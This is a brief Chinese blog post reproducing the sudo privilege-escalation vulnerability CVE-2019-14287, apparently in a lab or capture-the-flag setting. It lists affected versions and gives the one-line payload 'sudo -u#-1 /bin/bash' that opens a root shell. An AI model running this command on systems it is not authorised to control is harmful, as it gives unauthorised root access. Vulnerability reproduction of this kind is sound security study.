Linux sudo权限提升漏洞

CVE-2019-14287

漏洞影响

1.8.28之前的sudo版本均会受到影响

漏洞复现

现在的用户alice没权限看flag文件

查看sudo版本

符合利用条件,payload:sudo -u#-1 /bin/bash


Linux sudo权限提升漏洞
https://www.dr0n.top/posts/74c47e67/
作者
dr0n
发布于
2021年11月24日
更新于
2024年3月21日
许可协议